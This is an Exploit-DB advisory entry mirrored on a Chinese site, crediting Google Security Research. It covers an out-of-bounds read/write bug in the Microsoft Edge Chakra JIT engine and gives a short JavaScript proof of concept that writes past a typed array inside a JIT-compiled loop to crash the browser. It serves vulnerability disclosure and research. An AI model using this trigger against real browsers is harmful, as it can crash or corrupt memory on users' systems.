Microsoft Edge Chakra JIT – Out-of-Bounds Reads/Writes - 体验盒子

作者： Google Security Research

日期： 2018-07-12

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/45011/

/*
It seems that this issue is similar to theissue 1429(MSRC 42111). It might need to refresh the page several times to observe a crash.

PoC:
*/

let arr = new Uint32Array(1000);
for (let i = 0; i < 0x1000000; i++) {
for (let j = 0; j < 1; j++) {
i--;
i++;
}

arr[i] = 0x1234;
}